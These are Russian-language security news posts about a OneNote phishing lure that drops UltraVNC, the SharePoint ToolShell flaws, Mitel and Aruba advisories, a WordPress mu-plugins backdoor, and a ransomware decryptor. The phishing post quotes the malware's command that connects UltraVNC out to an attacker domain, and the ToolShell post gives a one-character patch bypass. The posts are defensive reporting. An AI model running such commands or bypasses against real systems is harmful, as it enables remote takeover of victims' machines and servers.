15 июля, предположительно, злоумышленники рассылали фишинговые письма с вложением Письмо_ФНС_России.one. При открытии документа пользователь видел заметку «Письмо ФНС России» и значок прикрепленного ZIP-архива.
Архив содержал исполняемый файл Письмо_ФНС_России_от_01_июля_2025_г.___АБ-4-20_1906_О_новых.exe, который является Rust-дроппером.
Дроппер создавал на диске файлы: отвлекающий документ (Письмо_ФНС_России_от_[дата].pdf), утилиту WinRAR (beseeching.exe), архив с дополнительными файлами (centrifuges.rar), а также скрипт, запускающий распаковку RAR-архива (wowwow.cmd).
В свою очередь, RAR-архив содержал: экземпляр UltraVNC (PhPHost.exe), файл, запускающий его (bhumidar.bat), и answers.bat - скрипт для закрепления в системе через планировщик задач.
После демонстрации отвлекающего документа и закрепления в системе в фоновом режиме происходила инсталляция инструмента UltraVNC: start "" %public%\Documents\PnPHost.exe -autoreconnect ID:7o9_%COMPUTERNAME%_Y1 -connect furnitura-zamki[.]ru:443.
Иных подробностей исследователи не раскрывают. Возможно, в ближайшее время что-то появиться в блоге, так что будем следить.
👆Анализ отчета "Лаборатории Касперского" подсвечивает интересные и важные детали:
1️⃣ Первый патч Microsoft для CVE-2025-49704 был "дефектным" по своей сути, так как требовал ручного запуска "SharePoint Products Configuration Wizard".
Microsoft не устраняет собственно уязвимость, а пытается снизить риски, добавив новый класс AddExcelDataSetToSafeControls в пространство имен Microsoft.SharePoint.Upgrade. Этот класс содержит новый код, который модифицирует файл web.config и помечает элемент управления Microsoft.PerformancePoint.Scorecards.ExcelDataSet как небезопасный. При этом все, кто установил обновление, но не запустил апгрейд вручную, остаются уязвимыми к этой CVE. Многие администраторы, установившие исправление, остались уязвимыми, даже не подозревая об этом.
2️⃣ ЛК удалось обойти патч CVE-2025-49706, добавив всего один байт к POST-запросу, выступающему в роли эксплойта. Все, что потребовалось — добавить символ / в конец пути к ToolPane.aspx.
3️⃣ Читатели, знакомые с предыдущими эксплойтами для SharePoint, могут заметить, что уязвимость CVE-2025-49704/CVE-2025-53770 и эксплойт, использованный атакующими, похожи на более старую RCE-уязвимость CVE-2020-1147 во фреймворке .NET, SharePoint Server и Visual Studio. На самом деле, если сравнить эксплойты к CVE-2025-49704/CVE-2025-53770 и CVE-2020-1147, то можно увидеть, что код практически идентичен. Единственная разница — в том, что в эксплойте для CVE-2025-49704/CVE-2025-53770 опасный объект ExpandedWrapper помещен в список. Таким образом, можно сказать, что CVE-2025-53770 — это вариант CVE-2020-1147, а патч к ней — обновленный патч к уязвимости 2020 года.
4️⃣ Несмотря на то что патчи к уязвимостям ToolShell уже доступны, цепочка эксплойтов будет использоваться атакующими еще долго. Подобная ситуация наблюдалась с другими печально известными уязвимостями, такими как ProxyLogon, PrintNightmare или EternalBlue. Хотя их обнаружили несколько лет назад, некоторые злоумышленники до сих пор продолжают использовать их в атаках на непропатченные системы. Такая же судьба постигнет и ToolShell, поскольку эти уязвимости крайне просты в эксплуатации и позволяют получить полный контроль над уязвимым сервером.
👆Под атаку попали серверы по всему миру, в том числе в 🇪🇬Египте, 🇯🇴Иордании, 🇷🇺России, 🇻🇳Вьетнаме и 🇿🇲Замбии, а затронутые организации относились к различным отраслям, включая государственные и финансовые учреждения, сельское хозяйство, промышленность и лесоводство. Западные отчеты и СМИ создают картину целенаправленной атаки на госсектор 🇺🇸США, но широкая география указывает именно на массовую проблему.
💚 https://securelist.ru/toolshell-explained/113097 (Русский)
💚 https://securelist.com/toolshell-explained/117045 (Eng)
✋ @Russian_OSINT
Mitel Networks предупреждает о критической уязвимости обхода аутентификации, затрагивающую ее корпоративную коммуникационную платформу MiVoice MX-ONE.
MX-ONE - это коммуникационная система компании на базе SIP, которая может масштабироваться для поддержки сотен тысяч пользователей.
Критическая уязвимость связана с ненадлежащим контролем доступа в компоненте MiVoice MX-ONE Provisioning Manager, и ей пока не присвоен идентификатор CVE.
Злоумышленники, не прошедшие аутентификацию, могут использовать её в атаках низкой сложности, не требующих взаимодействия с пользователем, для получения несанкционированного доступа к учётным записям администраторов в системах без установленных обновлений.
По данным Mitel, уязвимость затрагивает MiVoice MX-ONE, работающие под управлением версий 7.3 (7.3.0.0.50) - 7.8 SP1 (7.8.1.0.14). Исправлена в версиях 7.8 (MXO-15711_78SP0) и 7.8 SP1 (MXO-15711_78SP1).
Поставщик рекомендует не предоставлять доступ к сервисам MX-ONE напрямую через интернет, разворачивать систему MX-ONE исключительно в доверенной сети.
Риски также можно снизить, ограничив доступ к сервису Provisioning Manager.
Пользователям MiVoice MX-ONE версии 7.3 и более поздних версий следует направить запрос на исправление в компанию через своего авторизованного сервисного партнера.
Mitel также раскрыла серьезную SQL-уязвимость (CVE-2025-52914) в платформе для совместной работы MiCollab, которую можно использовать для выполнения произвольных команд базы данных SQL на необновленных устройствах.
Как заявляет поставщик, сведений об эксплуатации обеих проблем в реальных условиях не поступало.
Тем не менее, предыдущие уязвимости в обхода пути MiCollab (CVE-2024-55550 и CVE-2024-41713) достаточно активно задействовались в атаках.
Что не удивительно, ведь продукцию Mitel используют более 60 000 клиентов и более 75 млн. пользователей в различных секторах, включая образование, здравоохранение, финансы, промышленность и государственный сектор.
Исследователи обнаружили новый бэкдор, скрытый в каталоге mu-plugins на сайтах WordPress, который предоставляет злоумышленникам постоянный доступ и позволяет им выполнять произвольные действия.
Обязательные плагины (также известные как mu-plugins) — это спецплагины, которые автоматически активируются на всех сайтах WordPress в процессе установки.
По умолчанию они размещаются в каталоге wp-content/mu-plugins.
Эта особенность вызывает особую привлекательность для злоумышленников, так mu-plugins не отображаются в списке плагинов по умолчанию в wp-admin и не могут быть отключены, кроме как путем удаления файла плагина из обязательного для использования каталога.
В результате вредоносная ПО, использующая эту технику, может функционировать незаметно, не вызывая подозрений.
Обнаруженный Sucuri PHP-скрипт в каталоге mu-plugins (wp-index.php) служит загрузчиком для извлечения полезной нагрузки следующего этапа и сохранения ее в базе данных WordPress в таблице wp_options в разделе _hdra_core.
Удаленная полезная нагрузка извлекается из URL-адреса, который зашифрован с помощью ROT13 - простого подстановочного шифра, который заменяет букву на 13-ю букву после нее (т.е. A становится N, B - O, C - P и т.д.).
Извлеченный контент затем временно записывается на диск и выполняется.
Бэкдор предоставляет злоумышленнику постоянный доступ к сайту и возможность удалённо запускать любой PHP-код.
В частности, он внедряет скрытый файловый менеджер в каталог темы под именем pricing-table-3.php, позволяя злоумышленникам просматривать, загружать и удалять файлы.
Он также создаёт пользователя-администратора с именем officialwp, а затем загружает вредоносный плагин (wp-bot-protect.php) и активирует его.
Помимо повторного заражения в случае удаления, вредоносная ПО позволяет менять пароли админов (с распространенными именами «admin», «root» и «wpsupport»), на пароль по умолчанию, установленный злоумышленником.
Опция также затрагивает пользователя officialwp.
При этом злоумышленники могут получать постоянный доступ к сайтам и выполнять вредоносные действия, фактически блокируя других администраторов.
Диапазон вредоносных действий может варьироваться от кражи данных до внедрения кода, который может заражать посетителей вредоносным ПО или перенаправлять их на другие сайты.
Еще одна интересная деталь, которую следует добавить к нашему разбору кейса с 0-day в Microsoft SharePoint (известную как ToolShell).
Сообщается, что одной из жертв ToolShell стало Национальное управление по ядерной безопасности США (NNSA).
NNSA - это правительственное агентство в составе Министерства энергетики США, которое отвечает за контроль над ядерным оружием страны, а также реализует реагирование на ядерные и радиационные чрезвычайные ситуации в США и за их пределами.
Как сообщил Bloomberg представитель Министерства энергетики, в пятницу, 18 июля, эксплуатация 0-day в Microsoft SharePoint привела к взлому сети организации.
При этом само министерство пострадало минимально благодаря широкому использованию облака Microsoft M365 и эшелонированной системе киберзащиты.
Пострадало лишь ограниченное число систем NNSA, которые в настоящее время активно восстанавливаются.
Анонимный источник в агентстве также отметил, что, по всей видимости, в результате утечки не была раскрыта какая-либо конфиденциальная или секретная информация.
В целом, как заключают исследователи Eye Security, к настоящему времени число скомпрометированных в результате атак ToolShell объектов значительно возросло.
Согласно телеметрии компании, злоумышленники, стоящие за этими атаками, уже заразили вредоносным ПО не менее 400 серверов и взломали 148 организаций по всему миру.
И это еще не конец. Будем следить.
Кейс с 0-day (CVE-2025-53770) атаками на сервера SharePoint, названные ShellTool, вызвал достаточно широкий общественный резонанс, в виду которого вышло значительное число отчетов с отражением большого числа подробностей.
Для понимания развития всей ситуации решили сосредоточиться на хронологии основных событий, а также отразить наиболее значимые моменты:
- Сама 0-day и атаки были раскрыты в субботу, 19 июля, а на следующий день были выпущены патчи. Она представляет собой вариант старой RCE, известной как CVE-2025-49704, которая была исправлена ранее в этом месяце.
- Ошибка позволяет получить данные конфигурации MachineKey сервера SharePoint, которые затем можно использовать для обхода аутентификации и проведения атаки с целью RCE.
- Ранее злоумышленники пытались использовать CVE-2025-49704 и CVE-2025-49706, прежде чем переключиться на CVE-2025-53770. Обе они демонстрировались на Pwn2Own Berlin в мае этого года под названием ShellTool.
- Microsoft также исправила четвертую ошибку, CVE-2025-53771, которая представляет собой ошибку обхода пути, являющуюся разновидностью CVE-2025-49706 и, вероятно, также находящуюся под угрозой эксплуатации.
- 0-day затрагивает только локальные серверы SharePoint версий 2016 и 2019. Серверы SharePoint 2010 и 2013 также уязвимы, но исправление для них не будет выпущено. Облачные серверы Microsoft SharePoint не затронуты.
- Злоумышленники используют 0-day для развертывания веб-шеллов на взломанных серверах. Microsoft связала некоторые атаки с тремя китайскими APT: Linen Typhoon, Violet Typhoon и Storm-2603.
- Первые две группы действуют с 2012 и 2015 годов соответственно и связаны со шпионскими операциями. Третья более новая: некоторые атаки заканчивались развертыванием программ-вымогателей Warlock и Lockbit.
- SentinelOne также связала атаки с тремя кластерами, но не назвала ни имен, ни источника атак.
- Microsoft и SentinelOne сообщают, что теперь они обнаружили и других злоумышленников, также эксплуатирующих 0-day, включая другие APT.
- По данным Tenable, публичный PoC для уязвимости теперь широко доступен.
- По данным Censys, к Интернету подключено более 9700 серверов SharePoint 2016 и 2019 и, как полагает NextGov, более 1100 из них связаны с госсектором.
- По данным многочисленных источников, на сотнях из них установлены веб-шеллы, хотя неясно, связано ли это с ShellTool.
- Телеметрия Eye Security и SentinelOne показала, что первая волна атак началась 17 июля. После этого последовали и другие кампании.
- По данным WaPo, ряд госучреждений подверглись взлому.
- Исследователи SentinelOne полагают, что первоначальные цели свидетельствуют о том, что изначально деятельность была тщательно таргетированной. После раскрытия информации атаки стали носить ситуативный характер.
- В некоторых отчетах утверждается, что также была эксплуатирована CVE-2025-53771, но Microsoft этого пока не подтверждает.
- Помимо исправления ошибок, организациям следует также проводить ротацию криптографических материалов MachineKey и сканирование на наличие известных веб-шеллов. Украденные MachineKeys позволят в будущем получить доступ через бэкдор, даже после исправления систем.
- Теперь также доступен сканер, а также множество IOC в следующих отчетах: Broadcom Symantec, CISA, Cisco Talos, Censys, Check Point, CrowdStrike, Eye Security, Logpoint, Microsoft, Orange, Palo Alto Networks, Qualys, SentinelOne, Tenable, Trend Micro и Varonis.
Hewlett-Packard Enterprise (HPE) предупреждает о жестко запрограммированных учетных данных в точках доступа Aruba Instant On, которые позволяют злоумышленникам обходить обычную аутентификацию устройства и получать доступ к веб-интерфейсу.
Aruba Instant On - это компактные беспроводные (Wi-Fi) устройства с функцией plug-and-play, разработанные для малого и среднего бизнеса с функционалом корпоративного уровня (гостевые сети, сегментация трафика) и управлением через облако/мобильные приложения.
CVE-2025-37103 имеет оценку CVSS v3.1: 9,8 и затрагивает точки доступа Instant On с версией прошивки 3.2.0.1 и ниже.
Успешная эксплуатация уязвимости позволяет удаленному злоумышленнику получить административный доступ к системе.
Поскольку административные учетные данные жестко запрограммированы в прошивке, для опытных пользователей их обнаружение не представляет особой сложности.
Получив доступ к веб-интерфейсу в качестве администраторов, злоумышленники могут изменить настройки точки доступа, перенастроить систему безопасности, установить бэкдоры, осуществлять перехват трафика и даже осуществить горизонтальное перемещение.
Уязвимость была обнаружена исследователем ZZ из Ubisectech Sirius, который сообщил о ней непосредственно поставщику.
В том же бюллетене HPE указывает на вторую серьёзную CVE-2025-37102, связанную с аутентифицированным внедрением команд в интерфейс командной строки (CLI) точек доступа Aruba Instant On.
Ее можно связать с CVE-2025-37103, поскольку для ее эксплуатации требуются права администратора, что позволяет злоумышленникам вводить произвольные команды в CLI для извлечения данных, отключения безопасности и обеспечения устойчивости.
Обе проблемы решаются обновлением прошивки до версии 3.2.1.0 (или более поздней), обходные пути отсутствуют.
HPE Aruba Networking не располагает информацией об эксплуатации этих двух уязвимостей, однако, как полагает поставщик, ситуация может быстро измениться.
Топ телеграм-каналов в ИБ
Июль, когда адский месяц массовых отпусков и информационного треша в мире не начался, подходящее время для нашего третьего рейтинга каналов по ИБ.
В третьем рейтинге есть те, кто появился в Telegram совсем недавно, но уже делает качественный контент и имеет вес в количестве подписчиков.
Некоторых новоприбывших мы тоже хотели добавить, но у них пока что очень малое количество подписчиков, а самое главное — мало содержания. Поэтому их мы, надеемся, увидим уже в следующем рейтинге.
Часть 1.
Авторские:
1. Пост Лукацкого
2. Пакет Безопасности
3. Sachok
4. Сицебрекс
4. Ever Secure и Технологический болт Генона
5. Солдатов в телеграм, BESSEС, Евгений Касперский
6. ZLONOV, Управление уязвимостями и прочее и Топ кибербезопасности Батранкова
7. Максимов.Записки
8. Наталья Касперская
9. Вектор Грабского
Offensive:
1. Похек
2. Red team brazzers
3. Багхантер
4. Кавычка
5. Егор Богомолов
6. Заметки Слонсера и PRO:PENTEST
7. s0i37_chanel
Поросенок Петр
GigaHackers
Defensive:
1. ESCalator
2. README.hta
3. Blue (h/c)at Café и Security wine (бывший - DevSecOps Wine) и Makrushin
4. Disasm.me channel
5. Четыре луча, AppSec Journey и PurpleBear
Mixed:
1. k8s (in)security
2. Кибервойна и Mobile AppSec World
3. Репорты простым языком
4. Сертификат безопасности
5. Кибербез образование, Райтапы по CTF {2025}, ГОСТ VPN | aveselov.ru, PWN AI, Monkey see, monkey do
Микроблоги:
1. Ильдар Пишет
2. Омский багхантер
3. Банка пывна и Про ИБ с высоты каблуков и Кибербез Андрея Дугина
4. Двое из Кибермаркетинга
5. NA_SOC
6. Защита персональных данных и не только и SbX | Security by Xyurity
Новостные/агрегаторы:
1. SecАtor
2. НеЛукацкий
3. Утечки информации и Порвали два трояна и Offensive Twitter
5. Об ЭП и УЦ
6. RUSCADASEC news: Кибербезопасность АСУ ТП
Корпоративные:
1. Kaspersky
2. Базис
3. Avanpost
4. Борьба с киберпреступностью | F6 и BI.ZONE
5. Innostage
6. РТ-ИБ, 3side кибербезопасности
7. Echelon Eyes
8. VK Security
9. Солар
10. Red Security
Каналы IT-журналистов:
1. Грустный киберпанк
2. КиберBEZправил
3. Radio Tishina
4. Игнатий Цукергрохер
5. Doomtech
6. Убедился корр. ТАСС
7. Точксичная цифра, Первый канал, Корневой DoStup
8. По сути, Аркадий
@cybersachok
Японские силовики представили дешифратор для Phobos и 8base ransomware, который может быть использован жертвами для бесплатного восстановления залоченных файлов.
Phobos функционировала по модели RaaS, начиная с 2018 года.
Несмотря непубличный характер своей деятельности, Phobos считается одной из наиболее широко распространенных RaaS, ответственной за множество атак по всему миру.
В свою очередь, банда 8base приступила к работе в 2023 году с использованием утекшей версии кода Phobos, практикуя классическую схему двойного вымогательства.
В 2024 году подозреваемый в организации Phobos RaaS был задержан и экстрадирован из Южной Кореи в США, где ему предъявили обвинения по 13 пунктам.
Затем в результате международной операции силовых ведомств также было заблокировано и изъято 27 серверов, а также арестовано четверо подозреваемых в руководстве группировкой 8Base.
Власти Японии не раскрывают, каким образом им удалось разработать дешифратор.
Тем не менее обстоятельства дают все основания полагать, что для этого использовался мощный инструмент современной прикладной криптографии, а именно: терморектальный криптоанализор.
Дешифратор можно загрузить с сайта японской полиции (инструкция прилагается), а также доступен на платформе Европола - NoMoreRansom.
Следует отметить: Google Chrome и Mozilla Firefox распознают дешифратор как вредоносное ПО, что затрудняет его загрузку и использование.
Однако результаты практических тестов дешифратора показали его высокую эффективность.
В настоящее время он поддерживает расшифровку файлов со следующими расширениями: phobos, 8base, elbie, faust и LIZARD.
Но, как сообщают японские правоохранители, могут поддерживаться и некоторые другие расширения.
Так что жертвам Phobos и 8Base стоит протестировать дешифратор, даже если их зашифрованные файлы не входят в указанный перечень расширений. Вполне возможно, что утилита их также сможет отработать.